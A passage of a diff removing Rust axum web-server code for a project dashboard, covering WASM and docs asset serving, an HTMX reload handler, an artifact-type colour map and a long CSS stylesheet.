- [( - axum::http::header::CONTENT_TYPE, - "text/plain; charset=utf-8", - )], - content, - ) - .into_response(), - Err(_) => (axum::http::StatusCode::NOT_FOUND, "not found").into_response(), - } -} - -/// GET /wasm/{*path} — serve jco-transpiled WASM assets for browser-side rendering. -async fn wasm_asset(Path(path): Path) -> impl IntoResponse { - let content_type = if path.ends_with(".js") { - "application/javascript" - } else if path.ends_with(".wasm") { - "application/wasm" - } else if path.ends_with(".d.ts") { - "application/typescript" - } else { - "application/octet-stream" - }; - - // Try embedded assets first (when built with embed-wasm feature). - #[cfg(feature = "embed-wasm")] - { - let bytes: Option<&[u8]> = match path.as_str() { - "spar_wasm.js" => Some(embedded_wasm::SPAR_JS.as_bytes()), - "spar_wasm.core.wasm" => Some(embedded_wasm::CORE_WASM), - "spar_wasm.core2.wasm" => Some(embedded_wasm::CORE2_WASM), - "spar_wasm.core3.wasm" => Some(embedded_wasm::CORE3_WASM), - _ => None, - }; - if let Some(data) = bytes { - return ( - axum::http::StatusCode::OK, - [ - (axum::http::header::CONTENT_TYPE, content_type), - (axum::http::header::CACHE_CONTROL, "public, max-age=86400"), - ], - data.to_vec(), - ) - .into_response(); - } - } - - // Fallback to filesystem (development mode). - // Try the workspace assets dir first, then next to the binary. - let candidates = [ - std::env::current_dir() - .unwrap_or_default() - .join("rivet-cli/assets/wasm/js") - .join(&path), - std::env::current_exe() - .unwrap_or_default() - .parent() - .unwrap_or(std::path::Path::new(".")) - .join("assets/wasm/js") - .join(&path), - ]; - - for candidate in &candidates { - if let Ok(bytes) = std::fs::read(candidate) { - return ( - axum::http::StatusCode::OK, - [ - (axum::http::header::CONTENT_TYPE, content_type), - (axum::http::header::CACHE_CONTROL, "no-cache"), - ], - bytes, - ) - .into_response(); - } - } - - ( - axum::http::StatusCode::NOT_FOUND, - [(axum::http::header::CONTENT_TYPE, "text/plain")], - format!("WASM asset not found: {path}").into_bytes(), - ) - .into_response() -} - -/// POST /reload — re-read the project from disk and replace the shared state. -/// -/// Uses the `HX-Current-URL` header (sent automatically by HTMX) to redirect -/// back to the current page after reload, preserving the user's position. -async fn reload_handler( - State(state): State, - headers: axum::http::HeaderMap, -) -> impl IntoResponse { - let (project_path, schemas_dir, port) = { - let guard = state.read().await; - ( - guard.project_path_buf.clone(), - guard.schemas_dir.clone(), - guard.context.port, - ) - }; - - match reload_state(&project_path, &schemas_dir, port) { - Ok(new_state) => { - let mut guard = state.write().await; - *guard = new_state; - - // Redirect back to wherever the user was (HTMX sends HX-Current-URL). - // Extract the path portion from the full URL (e.g. "http://localhost:3001/documents/DOC-001" → "/documents/DOC-001"). - // Navigate back to wherever the user was (HTMX sends HX-Current-URL). - // HX-Location does a client-side HTMX navigation (fetch + swap + push-url). - let redirect_url = headers - .get("HX-Current-URL") - .and_then(|v| v.to_str().ok()) - .and_then(|full_url| { - full_url - .find("://") - .and_then(|i| full_url[i + 3..].find('/')) - .map(|j| { - let start = full_url.find("://").unwrap() + 3 + j; - full_url[start..].to_owned() - }) - }) - .unwrap_or_else(|| "/".to_owned()); - - let location_json = format!( - "{{\"path\":\"{}\",\"target\":\"#content\"}}", - redirect_url.replace('"', "\\\"") - ); - - ( - axum::http::StatusCode::OK, - [("HX-Location", location_json)], - "reloaded".to_owned(), - ) - } - Err(e) => { - eprintln!("reload error: {e:#}"); - ( - axum::http::StatusCode::INTERNAL_SERVER_ERROR, - [( - "HX-Location", - "{\"path\":\"/\",\"target\":\"#content\"}".to_owned(), - )], - format!("reload failed: {e}"), - ) - } - } -} - -/// GET /docs-asset/{*path} — serve static files (images, SVG, etc.) from docs directories. -async fn docs_asset( - State(state): State, - Path(path): Path, -) -> impl IntoResponse { - let state = state.read().await; - - // Sanitize: reject path traversal - if path.contains("..") { - return ( - axum::http::StatusCode::BAD_REQUEST, - [("Content-Type", "text/plain")], - Vec::new(), - ); - } - - // Search through all doc directories for the requested file - for dir in &state.doc_dirs { - let file_path = dir.join(&path); - if file_path.is_file() { - if let Ok(bytes) = std::fs::read(&file_path) { - let content_type = - match file_path.extension().and_then(|e| e.to_str()).unwrap_or("") { - "png" => "image/png", - "jpg" | "jpeg" => "image/jpeg", - "gif" => "image/gif", - "svg" => "image/svg+xml", - "webp" => "image/webp", - "pdf" => "application/pdf", - _ => "application/octet-stream", - }; - return ( - axum::http::StatusCode::OK, - [("Content-Type", content_type)], - bytes, - ); - } - } - } - - ( - axum::http::StatusCode::NOT_FOUND, - [("Content-Type", "text/plain")], - b"not found".to_vec(), - ) -} - -// ── Color palette ──────────────────────────────────────────────────────── - -fn type_color_map() -> HashMap { - let pairs: &[(&str, &str)] = &[ - // STPA - ("loss", "#dc3545"), - ("hazard", "#fd7e14"), - ("system-constraint", "#20c997"), - ("controller", "#6f42c1"), - ("uca", "#e83e8c"), - ("control-action", "#17a2b8"), - ("feedback", "#6610f2"), - ("causal-factor", "#d63384"), - ("safety-constraint", "#20c997"), - ("loss-scenario", "#e83e8c"), - ("controller-constraint", "#20c997"), - ("controlled-process", "#6610f2"), - ("sub-hazard", "#fd7e14"), - // ASPICE - ("stakeholder-req", "#0d6efd"), - ("system-req", "#0dcaf0"), - ("system-architecture", "#198754"), - ("sw-req", "#198754"), - ("sw-architecture", "#0d6efd"), - ("sw-detailed-design", "#6610f2"), - ("sw-unit", "#6f42c1"), - ("system-verification", "#6610f2"), - ("sw-verification", "#6610f2"), - ("system-integration-verification", "#6610f2"), - ("sw-integration-verification", "#6610f2"), - ("sw-unit-verification", "#6610f2"), - ("qualification-verification", "#6610f2"), - // Dev - ("requirement", "#0d6efd"), - ("design-decision", "#198754"), - ("feature", "#6f42c1"), - // Cybersecurity - ("asset", "#ffc107"), - ("threat", "#dc3545"), - ("cybersecurity-req", "#fd7e14"), - ("vulnerability", "#e83e8c"), - ("attack-path", "#dc3545"), - ("cybersecurity-goal", "#0d6efd"), - ("cybersecurity-control", "#198754"), - ("security-verification", "#6610f2"), - ("risk-assessment", "#fd7e14"), - ("security-event", "#e83e8c"), - ]; - pairs - .iter() - .map(|(k, v)| (k.to_string(), v.to_string())) - .collect() -} - -/// Return a colored badge `` for an artifact type. -/// -/// Uses the `type_color_map` hex color as text and computes a 12%-opacity -/// tinted background from it. -fn badge_for_type(type_name: &str) -> String { - let colors = type_color_map(); - let hex = colors - .get(type_name) - .map(|s| s.as_str()) - .unwrap_or("#5b2d9e"); - // Parse hex → rgb - let hex_digits = hex.trim_start_matches('#'); - let r = u8::from_str_radix(&hex_digits[0..2], 16).unwrap_or(91); - let g = u8::from_str_radix(&hex_digits[2..4], 16).unwrap_or(45); - let b = u8::from_str_radix(&hex_digits[4..6], 16).unwrap_or(158); - format!( - "{}", - html_escape(type_name) - ) -} - -// ── CSS ────────────────────────────────────────────────────────────────── - -const CSS: &str = r#" -/* ── Reset & base ─────────────────────────────────────────────── */ -*,*::before,*::after{box-sizing:border-box;margin:0;padding:0} -:root{ - --bg: #f5f5f7; - --surface:#fff; - --sidebar:#0f0f13; - --sidebar-hover:#1c1c24; - --sidebar-text:#9898a6; - --sidebar-active:#fff; - --text: #1d1d1f; - --text-secondary:#6e6e73; - --border: #e5e5ea; - --accent: #3a86ff; - --accent-hover:#2568d6; - --radius: 10px; - --radius-sm:6px; - --shadow: 0 1px 3px rgba(0,0,0,.06),0 1px 2px rgba(0,0,0,.04); - --shadow-md:0 4px 12px rgba(0,0,0,.06),0 1px 3px rgba(0,0,0,.04); - --mono: 'JetBrains Mono','Fira Code','SF Mono',Menlo,monospace; - --font: 'Atkinson Hyperlegible',system-ui,-apple-system,sans-serif; - --transition:180ms ease; -} -html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-rendering:optimizeLegibility} -body{font-family:var(--font);color:var(--text);background:var(--bg);line-height:1.6;font-size:15px} - -/* ── Links ────────────────────────────────────────────────────── */ -a{color:var(--accent);text-decoration:none;transition:color var(--transition)} -a:hover{color:var(--accent-hover)} -a:focus-visible{outline:2px solid var(--accent);outline-offset:2px;border-radius:3px} - -/* ── Shell layout ─────────────────────────────────────────────── */ -.shell{display:flex;min-height:100vh} -.content-area{display:flex;flex-direction:column;flex:1;min-width:0} - -/* ── Sidebar navigation ──────────────────────────────────────── */ -nav{width:232px;background:var(--sidebar);color:var(--sidebar-text); - padding:1.75rem 1rem;flex-shrink:0;display:flex;flex-direction:column; - position:sticky;top:0;height:100vh;overflow-y:auto; - border-right:1px solid rgba(255,255,255,.06)} -nav h1{font-size:1.05rem;font-weight:700;color:var(--sidebar-active); - margin-bottom:2rem;letter-spacing:.04em;padding:0 .75rem; - display:flex;align-items:center;gap:.5rem} -nav h1::before{content:'';display:inline-block;width:8px;height:8px; - border-radius:50%;background:var(--accent);flex-shrink:0} -nav ul{list-style:none;display:flex;flex-direction:column;gap:2px} -nav li{margin:0} -nav a{display:flex;align-items:center;gap:.5rem;padding:.5rem .75rem;border-radius:var(--radius-sm); - color:var(--sidebar-text);font-size:.875rem;font-weight:500; - transition:all var(--transition)} -nav a:hover{background:var(--sidebar-hover);color:var(--sidebar-active);text-decoration:none} -nav a.active{background:rgba(58,134,255,.08);color:var(--sidebar-active);border-left:2px solid var(--accent);padding-left:calc(.75rem - 2px)} -nav a:focus-visible{outline:2px solid var(--accent);outline-offset:-2px} - -/* ── Main content ─────────────────────────────────────────────── */ -main{flex:1;padding:2.5rem 3rem;max-width:1400px;min-width:0;overflow-y:auto} -main.htmx-swapping{opacity:.4;transition:opacity 150ms ease-out} -main.htmx-settling{opacity:1;transition:opacity 200ms ease-in} - -/* ── Loading bar ──────────────────────────────────────────────── */ -#loading-bar{position:fixed;top:0;left:0;width:0;height:2px;background:var(--accent); - z-index:9999;transition:none;pointer-events:none} -#loading-bar.active{width:85%;transition:width 8s cubic-bezier(.1,.05,.1,1)} -#loading-bar.done{width:100%;transition:width 100ms ease;opacity:0;transition:width 100ms ease,opacity 300ms ease 100ms} - -/* ── Typography ───────────────────────────────────────────────── */ -h2{font-size:1.4rem;font-weight:700;margin-bottom:1.25rem;color:var(--text);letter-spacing:-.01em;padding-bottom:.75rem;border-bottom:1px solid var(--border)} -h3{font-size:1.05rem;font-weight:600;margin:1.5rem 0 .75rem;color:var(--text)} -code,pre{font-family:var(--mono);font-size:.85em} -pre{background:#f1f1f3;padding:1rem;border-radius:var(--radius-sm);overflow-x:auto} - -/* ── Tables ───────────────────────────────────────────────────── */ -table{width:100%;border-collapse:collapse;margin-bottom:1.5rem;font-size:.9rem} -th,td{text-align:left;padding:.65rem .875rem} -th{font-weight:600;font-size:.75rem;text-transform:uppercase;letter-spacing:.06em; - color:var(--text-secondary);border-bottom:2px solid var(--border);background:transparent} -td{border-bottom:1px solid var(--border)} -tbody tr{transition:background var(--transition)} -tbody tr:nth-child(even){background:rgba(0,0,0,.015)} -tbody tr:hover{background:rgba(58,134,255,.04)} -.tbl-filter-wrap{margin-bottom:.5rem} -.tbl-filter{width:100%;max-width:20rem;padding:.4rem .65rem;font-size:.85rem;font-family:var(--mono); - border:1px solid var(--border);border-radius:5px;background:var(--surface);color:var(--text); - outline:none;transition:border-color var(--transition)} -.tbl-filter:focus{border-color:var(--accent)} -.tbl-sort-arrow{font-size:.7rem;opacity:.6;margin-left:.25rem} -th:hover .tbl-sort-arrow{opacity:1} -td a{font-family:var(--mono);font-size:.85rem;font-weight:500} - -/* ── Badges ───────────────────────────────────────────────────── */ -.badge{display:inline-flex;align-items:center;padding:.2rem .55rem;border-radius:5px; - font-size:.73rem;font-weight:600;letter-spacing:.02em;line-height:1.4;white-space:nowrap} -.badge-error{background:#fee;color:#c62828} -.badge-warn{background:#fff8e1;color:#8b6914} -.badge-info{background:#e8f4fd;color:#0c5a82} -.badge-ok{background:#e6f9ed;color:#15713a} -.badge-type{background:#f0ecf9;color:#5b2d9e;font-family:var(--mono);font-size:.72rem} - -/* ── Validation bar ──────────────────────────────────────────── */ -.validation-bar{padding:1rem 1.25rem;border-radius:var(--radius);margin-bottom:1.25rem;font-weight:600;font-size:.95rem} -.validation-bar.pass{background:linear-gradient(135deg,#e6f9ed,#d4f5e0);color:#15713a;border:1px solid #b8e8c8} -.validation-bar.fail{background:linear-gradient(135deg,#fee,#fdd);color:#c62828;border:1px solid #f4c7c3} - -/* ── Status progress bars ────────────────────────────────────── */ -.status-bar-row{display:flex;align-items:center;gap:.75rem;margin-bottom:.5rem;font-size:.85rem} -.status-bar-label{width:80px;text-align:right;font-weight:500;color:var(--text-secondary)} -.status-bar-track{flex:1;height:20px;background:#e5e5ea;border-radius:4px;overflow:hidden;position:relative} -.status-bar-fill{height:100%;border-radius:4px;transition:width .3s ease} -.status-bar-count{width:40px;font-variant-numeric:tabular-nums;color:var(--text-secondary)} - -/* ── Cards ────────────────────────────────────────────────────── */ -.card{background:var(--surface);border-radius:var(--radius);padding:1.5rem; - margin-bottom:1.25rem;box-shadow:var(--shadow);border:1px solid var(--border); - transition:box-shadow var(--transition)} - -/* ── Stat grid ────────────────────────────────────────────────── */ -.stat-grid{display:grid;grid-template-columns:repeat(auto-fill,minmax(160px,1fr));gap:1rem;margin-bottom:1.75rem} -.stat-box{background:var(--surface);border-radius:var(--radius);padding:1.25rem 1rem;text-align:center; - box-shadow:var(--shadow);border:1px solid var(--border);transition:box-shadow var(--transition),transform var(--transition); - border-top:3px solid var(--border)} -.stat-box:hover{box-shadow:var(--shadow-md);transform:translateY(-1px)} -.stat-box .number{font-size:2rem;font-weight:800;letter-spacing:-.02em; - font-variant-numeric:tabular-nums;line-height:1.2} -.stat-box .label{font-size:.8rem;font-weight:500;color:var(--text-secondary);margin-top:.25rem; - text-transform:uppercase;letter-spacing:.04em} -.stat-blue{border-top-color:#3a86ff}.stat-blue .number{color:#3a86ff} -.stat-green{border-top-color:#15713a}.stat-green .number{color:#15713a} -.stat-orange{border-top-color:#e67e22}.stat-orange .number{color:#e67e22} -.stat-red{border-top-color:#c62828}.stat-red .number{color:#c62828} -.stat-amber{border-top-color:#b8860b}.stat-amber .number{color:#b8860b} -.stat-purple{border-top-color:#6f42c1}.stat-purple .number{color:#6f42c1} - -/* ── Link pills ───────────────────────────────────────────────── */ -.link-pill{display:inline-block;padding:.15rem .45rem;border-radius:4px; - font-size:.76rem;font-family:var(--mono);background:#f0f0f3; - color:var(--text-secondary);margin:.1rem;font-weight:500} - -/* ── Forms ────────────────────────────────────────────────────── */ -.form-row{display:flex;gap:1rem;align-items:end;flex-wrap:wrap;margin-bottom:1rem} -.form-row label{font-size:.8rem;font-weight:600;color:var(--text-secondary); - text-transform:uppercase;letter-spacing:.04em} -.form-row select,.form-row input[type="text"],.form-row input[type="search"], -.form-row input:not([type]),.form-row input[list]{ - padding:.5rem .75rem;border:1px solid var(--border);border-radius:var(--radius-sm); - font-size:.875rem;font-family:var(--font);background:var(--surface);color:var(--text); - transition:border-color var(--transition),box-shadow var(--transition);appearance:none; - -webkit-appearance:none} -.form-row select{padding-right:2rem;background-image:url("data:image/svg+xml,%3Csvg width='10' height='6' viewBox='0 0 10 6' fill='none' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath d='M1 1l4 4 4-4' stroke='%236e6e73' stroke-width='1.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3C/svg%3E"); - background-repeat:no-repeat;background-position:right .75rem center} -.form-row input:focus,.form-row select:focus{ - outline:none;border-color:var(--accent);box-shadow:0 0 0 3px rgba(58,134,255,.15)} -.form-row input[type="range"]{padding:0;border:none;accent-color:var(--accent);width:100%} -.form-row input[type="range"]:focus{box-shadow:none} -.form-row button{padding:.5rem 1.25rem;background:var(--accent);color:#fff;border:none; - border-radius:var(--radius-sm);font-size:.875rem;font-weight:600; - font-family:var(--font);cursor:pointer;transition:all var(--transition); - box-shadow:0 1px 2px rgba(0,0,0,.08)} -.form-row button:hover{background:var(--accent-hover);box-shadow:0 2px 6px rgba(58,134,255,.25);transform:translateY(-1px)} -.form-row button:active{transform:translateY(0)} -.form-row button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} - -/* ── Definition lists ─────────────────────────────────────────── */ -dl{margin:.75rem 0} -dt{font-weight:600;font-size:.8rem;color:var(--text-secondary);margin-top:.75rem; - text-transform:uppercase;letter-spacing:.04em} -dd{margin-left:0;margin-bottom:.25rem;margin-top:.2rem} - -/* ── Meta text ────────────────────────────────────────────────── */ -.meta{color:var(--text-secondary);font-size:.85rem} - -/* ── Nav icons & badges ───────────────────────────────────────── */ -.nav-icon{display:inline-flex;width:1.25rem;height:1.25rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.5} -nav a:hover .nav-icon,nav a.active .nav-icon{opacity:.9} -.nav-label{display:flex;align-items:center;gap:.5rem;flex:1;min-width:0} -.nav-badge{font-size:.65rem;font-weight:700;padding:.1rem .4rem;border-radius:4px; - background:rgba(255,255,255,.08);color:rgba(255,255,255,.4);margin-left:auto;flex-shrink:0} -.nav-badge-error{background:rgba(220,53,69,.2);color:#ff6b7a} -nav .nav-divider{height:1px;background:rgba(255,255,255,.06);margin:.75rem .75rem} - -/* ── Context bar ─────────────────────────────────────────────── */ -.context-bar{display:flex;align-items:center;gap:.75rem;padding:.5rem 1.5rem; - background:var(--surface);border-bottom:1px solid var(--border);font-size:.78rem;color:var(--text-secondary); - flex-wrap:wrap} -.context-bar .ctx-project{font-weight:700;color:var(--text);font-size:.82rem} -.context-bar .ctx-sep{opacity:.25} -.context-bar .ctx-git{font-family:var(--mono);font-size:.72rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(58,134,255,.08);color:var(--accent)} -.context-bar .ctx-dirty{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(220,53,69,.1);color:#c62828} -.context-bar .ctx-clean{font-family:var(--mono);font-size:.68rem;padding:.15rem .4rem;border-radius:4px; - background:rgba(21,113,58,.1);color:#15713a} -.context-bar .ctx-time{margin-left:auto;opacity:.6} -.ctx-switcher{position:relative;display:inline-flex;align-items:center} -.ctx-switcher-details{position:relative} -.ctx-switcher-details summary{cursor:pointer;list-style:none;display:inline-flex;align-items:center; - padding:.15rem .35rem;border-radius:4px;opacity:.5;transition:opacity .15s} -.ctx-switcher-details summary:hover{opacity:1;background:rgba(255,255,255,.06)} -.ctx-switcher-details summary::-webkit-details-marker{display:none} -.ctx-switcher-dropdown{position:absolute;top:100%;left:0;z-index:100;margin-top:.35rem; - background:var(--surface);border:1px solid var(--border);border-radius:var(--radius-sm); - padding:.5rem;min-width:280px;box-shadow:0 8px 24px rgba(0,0,0,.35)} -.ctx-switcher-item{padding:.5rem .65rem;border-radius:4px} -.ctx-switcher-item:hover{background:rgba(255,255,255,.04)} -.ctx-switcher-item .ctx-switcher-name{display:block;font-weight:600;font-size:.8rem;color:var(--text);margin-bottom:.2rem} -.ctx-switcher-item .ctx-switcher-cmd{display:block;font-size:.7rem;color:var(--text-secondary); - padding:.2rem .4rem;background:rgba(255,255,255,.04);border-radius:3px; - font-family:var(--mono);user-select:all;cursor:text} - -/* ── Footer ──────────────────────────────────────────────────── */ -.footer{padding:2rem 0 1rem;text-align:center;font-size:.75rem;color:var(--text-secondary); - border-top:1px solid var(--border);margin-top:3rem} - -/* ── Verification ────────────────────────────────────────────── */ -.ver-level{margin-bottom:1.5rem} -.ver-level-header{display:flex;align-items:center;gap:.75rem;margin-bottom:.75rem} -.ver-level-title{font-size:1rem;font-weight:600;color:var(--text)} -.ver-level-arrow{color:var(--text-secondary);font-size:.85rem} -details.ver-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); - display:flex;align-items:center;gap:.75rem;transition:background var(--transition)} -details.ver-row>summary::-webkit-details-marker{display:none} -details.ver-row>summary:hover{background:rgba(58,134,255,.04)} -details.ver-row[open]>summary{background:rgba(58,134,255,.04);border-bottom-color:var(--accent)} -details.ver-row>.ver-detail{padding:1rem 1.5rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border)} -.ver-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4} -details.ver-row[open] .ver-chevron{transform:rotate(90deg)} -.ver-steps{width:100%;border-collapse:collapse;font-size:.85rem;margin-top:.5rem} -.ver-steps th{text-align:left;font-weight:600;font-size:.72rem;text-transform:uppercase; - letter-spacing:.04em;color:var(--text-secondary);padding:.4rem .5rem;border-bottom:1px solid var(--border)} -.ver-steps td{padding:.4rem .5rem;border-bottom:1px solid rgba(0,0,0,.04);vertical-align:top} -.method-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600; - background:#e8f4fd;color:#0c5a82} - -/* ── Results ─────────────────────────────────────────────────── */ -.result-pass{color:#15713a}.result-fail{color:#c62828}.result-skip{color:#6e6e73} -.result-error{color:#e67e22}.result-blocked{color:#8b6914} -.result-dot{display:inline-block;width:8px;height:8px;border-radius:50%;margin-right:.35rem} -.result-dot-pass{background:#15713a}.result-dot-fail{background:#c62828} -.result-dot-skip{background:#c5c5cd}.result-dot-error{background:#e67e22}.result-dot-blocked{background:#b8860b} - -/* ── Diff ────────────────────────────────────────────────────── */ -.diff-added{background:rgba(21,113,58,.08)} -.diff-removed{background:rgba(198,40,40,.08)} -.diff-modified{background:rgba(184,134,11,.08)} -.diff-icon{display:inline-flex;align-items:center;justify-content:center;width:1.5rem;height:1.5rem; - border-radius:4px;font-size:.85rem;font-weight:700;flex-shrink:0;margin-right:.35rem} -.diff-icon-add{background:rgba(21,113,58,.12);color:#15713a} -.diff-icon-remove{background:rgba(198,40,40,.12);color:#c62828} -.diff-icon-modify{background:rgba(184,134,11,.12);color:#b8860b} -.diff-summary{display:flex;gap:1.25rem;padding:.75rem 1rem;border-radius:var(--radius-sm); - background:var(--surface);border:1px solid var(--border);margin-bottom:1.25rem;font-size:.9rem;font-weight:600} -.diff-summary-item{display:flex;align-items:center;gap:.35rem} -.diff-old{color:#c62828;text-decoration:line-through;font-size:.85rem} -.diff-new{color:#15713a;font-size:.85rem} -.diff-arrow{color:var(--text-secondary);margin:0 .25rem;font-size:.8rem} -details.diff-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); - display:flex;align-items:center;gap:.5rem;transition:background var(--transition)} -details.diff-row>summary::-webkit-details-marker{display:none} -details.diff-row>summary:hover{background:rgba(58,134,255,.04)} -details.diff-row[open]>summary{background:rgba(184,134,11,.06);border-bottom-color:var(--border)} -details.diff-row>.diff-detail{padding:.75rem 1.25rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border);font-size:.88rem} -.diff-field{padding:.3rem 0;display:flex;align-items:baseline;gap:.5rem} -.diff-field-name{font-weight:600;font-size:.8rem;color:var(--text-secondary);min-width:100px; - text-transform:uppercase;letter-spacing:.03em} - -/* ── Detail actions ──────────────────────────────────────────── */ -.detail-actions{display:flex;gap:.75rem;align-items:center;margin-top:1rem} -.btn{display:inline-flex;align-items:center;gap:.4rem;padding:.45rem 1rem;border-radius:var(--radius-sm); - font-size:.85rem;font-weight:600;font-family:var(--font);text-decoration:none; - transition:all var(--transition);cursor:pointer;border:none} -.btn-primary{background:var(--accent);color:#fff;box-shadow:0 1px 2px rgba(0,0,0,.08)} -.btn-primary:hover{background:var(--accent-hover);transform:translateY(-1px);color:#fff;text-decoration:none} -.btn-secondary{background:transparent;color:var(--text-secondary);border:1px solid var(--border)} -.btn-secondary:hover{background:rgba(0,0,0,.03);color:var(--text);text-decoration:none} - -/* ── Graph ────────────────────────────────────────────────────── */ -.graph-container{border-radius:var(--radius);overflow:hidden;background:#fafbfc;cursor:grab; - height:calc(100vh - 280px);min-height:400px;position:relative;border:1px solid var(--border)} -.graph-container:active{cursor:grabbing} -.graph-container svg{display:block;width:100%;height:100%;position:absolute;top:0;left:0} -.graph-controls{position:absolute;top:.75rem;right:.75rem;display:flex;flex-direction:column;gap:.35rem;z-index:10} -.graph-controls button{width:34px;height:34px;border:1px solid var(--border);border-radius:var(--radius-sm); - background:var(--surface);font-size:1rem;cursor:pointer;display:flex;align-items:center; - justify-content:center;box-shadow:var(--shadow);color:var(--text); - transition:all var(--transition)} -.graph-controls button:hover{background:#f0f0f3;box-shadow:var(--shadow-md)} -.graph-controls button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} -.graph-legend{display:flex;flex-wrap:wrap;gap:.75rem;padding:.75rem 0 .25rem;font-size:.82rem} -.graph-legend-item{display:flex;align-items:center;gap:.35rem;color:var(--text-secondary)} -.graph-legend-swatch{width:12px;height:12px;border-radius:3px;flex-shrink:0} - -/* ── Filter grid ──────────────────────────────────────────────── */ -.filter-grid{display:flex;flex-wrap:wrap;gap:.6rem;margin-bottom:.75rem} -.filter-grid label{font-size:.8rem;display:flex;align-items:center;gap:.3rem; - color:var(--text-secondary);cursor:pointer;padding:.2rem .45rem; - border-radius:4px;transition:background var(--transition); - text-transform:none;letter-spacing:0;font-weight:500} -.filter-grid label:hover{background:rgba(58,134,255,.06)} -.filter-grid input[type="checkbox"]{margin:0;accent-color:var(--accent);width:14px;height:14px; - cursor:pointer;border-radius:3px} - -/* ── Document styles ──────────────────────────────────────────── */ -.doc-body{line-height:1.8;font-size:.95rem} -.doc-body h1{font-size:1.4rem;font-weight:700;margin:2rem 0 .75rem;color:var(--text); - border-bottom:2px solid var(--border);padding-bottom:.5rem} -.doc-body h2{font-size:1.2rem;font-weight:600;margin:1.5rem 0 .5rem;color:var(--text)} -.doc-body h3{font-size:1.05rem;font-weight:600;margin:1.25rem 0 .4rem;color:var(--text-secondary)} -.doc-body p{margin:.5rem 0} -.doc-body ul{margin:.5rem 0 .5rem 1.5rem} -.doc-body li{margin:.2rem 0} -.doc-body img{border-radius:6px;margin:.75rem 0;box-shadow:0 2px 8px rgba(0,0,0,.1)} -.doc-body pre.mermaid{background:transparent;border:1px solid var(--border);border-radius:6px;padding:1rem;text-align:center} -.artifact-ref{display:inline-flex;align-items:center;padding:.15rem .5rem;border-radius:5px; - font-size:.8rem;font-weight:600;font-family:var(--mono);background:#edf2ff; - color:#3a63c7;cursor:pointer;text-decoration:none; - border:1px solid #d4def5;transition:all var(--transition)} -.artifact-ref:hover{background:#d4def5;text-decoration:none;transform:translateY(-1px);box-shadow:0 2px 4px rgba(0,0,0,.06)} -.artifact-ref.broken{background:#fde8e8;color:#c62828;border-color:#f4c7c3;cursor:default} -.artifact-ref.broken:hover{transform:none;box-shadow:none} -/* ── Artifact hover preview ────────────────────────────────── */ -.art-tooltip{position:absolute;z-index:1000;pointer-events:none; - background:var(--surface);border:1px solid var(--border);border-radius:var(--radius); - box-shadow:var(--shadow-lg);padding:0;max-width:340px;min-width:220px; - opacity:0;transition:opacity 120ms ease-in} -.art-tooltip.visible{opacity:1;pointer-events:auto} -.art-preview{padding:.75rem .85rem;font-size:.82rem;line-height:1.45} -.art-preview-header{display:flex;align-items:center;gap:.4rem;margin-bottom:.3rem} -.art-preview-title{font-weight:600;font-size:.85rem;margin-bottom:.3rem;color:var(--text)} -.art-preview-desc{color:var(--text-secondary);font-size:.78rem;line-height:1.4;margin-top:.3rem; - display:-webkit-box;-webkit-line-clamp:3;-webkit-box-orient:vertical;overflow:hidden} -.art-preview-links{font-size:.72rem;color:var(--text-secondary);margin-top:.35rem;font-family:var(--mono)} -.art-preview-tags{margin-top:.35rem;display:flex;flex-wrap:wrap;gap:.25rem} -.art-preview-tag{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; - background:rgba(58,134,255,.08);color:var(--accent);font-family:var(--mono)} -.doc-glossary{font-size:.9rem} -.doc-glossary dt{font-weight:600;color:var(--text)} -.doc-glossary dd{margin:0 0 .5rem 1rem;color:var(--text-secondary)} -.doc-toc{font-size:.88rem;background:var(--surface);border:1px solid var(--border); - border-radius:var(--radius);padding:1rem 1.25rem;margin-bottom:1.25rem; - box-shadow:var(--shadow)} -.doc-toc strong{font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;color:var(--text-secondary)} -.doc-toc ul{list-style:none;margin:.5rem 0 0;padding:0} -.doc-toc li{margin:.2rem 0;color:var(--text-secondary)} -.doc-toc .toc-h2{padding-left:0} -.doc-toc .toc-h3{padding-left:1.25rem} -.doc-toc .toc-h4{padding-left:2.5rem} -.doc-meta{display:flex;gap:.75rem;flex-wrap:wrap;align-items:center;margin-bottom:1.25rem} - -/* ── Source viewer ────────────────────────────────────────────── */ -.source-tree{font-family:var(--mono);font-size:.85rem;line-height:1.8} -.source-tree ul{list-style:none;margin:0;padding:0} -.source-tree li{margin:0} -.source-tree .tree-item{display:flex;align-items:center;gap:.4rem;padding:.2rem .5rem;border-radius:var(--radius-sm); - transition:background var(--transition);color:var(--text)} -.source-tree .tree-item:hover{background:rgba(58,134,255,.06);text-decoration:none} -.source-tree .tree-icon{display:inline-flex;width:1rem;height:1rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.55} -.source-tree .indent{display:inline-block;width:1.25rem;flex-shrink:0} -.source-viewer{font-family:var(--mono);font-size:.82rem;line-height:1.7;overflow-x:auto; - background:#fafbfc;border:1px solid var(--border);border-radius:var(--radius);padding:0} -.source-viewer table{width:100%;border-collapse:collapse;margin:0} -.source-viewer table td{padding:0;border:none;vertical-align:top} -.source-viewer table tr:hover{background:rgba(58,134,255,.04)} -.source-line{display:table-row} -.source-line .line-no{display:table-cell;width:3.5rem;min-width:3.5rem;padding:.05rem .75rem .05rem .5rem; - text-align:right;color:#b0b0b8;user-select:none;border-right:1px solid var(--border);background:#f5f5f7} -.source-line .line-content{display:table-cell;padding:.05rem .75rem;white-space:pre;tab-size:4} -.source-line-highlight{background:rgba(58,134,255,.08) !important} -.source-line-highlight .line-no{background:rgba(58,134,255,.12);color:var(--accent);font-weight:600} -.source-line:target{background:rgba(255,210,50,.18) !important} -.source-line:target 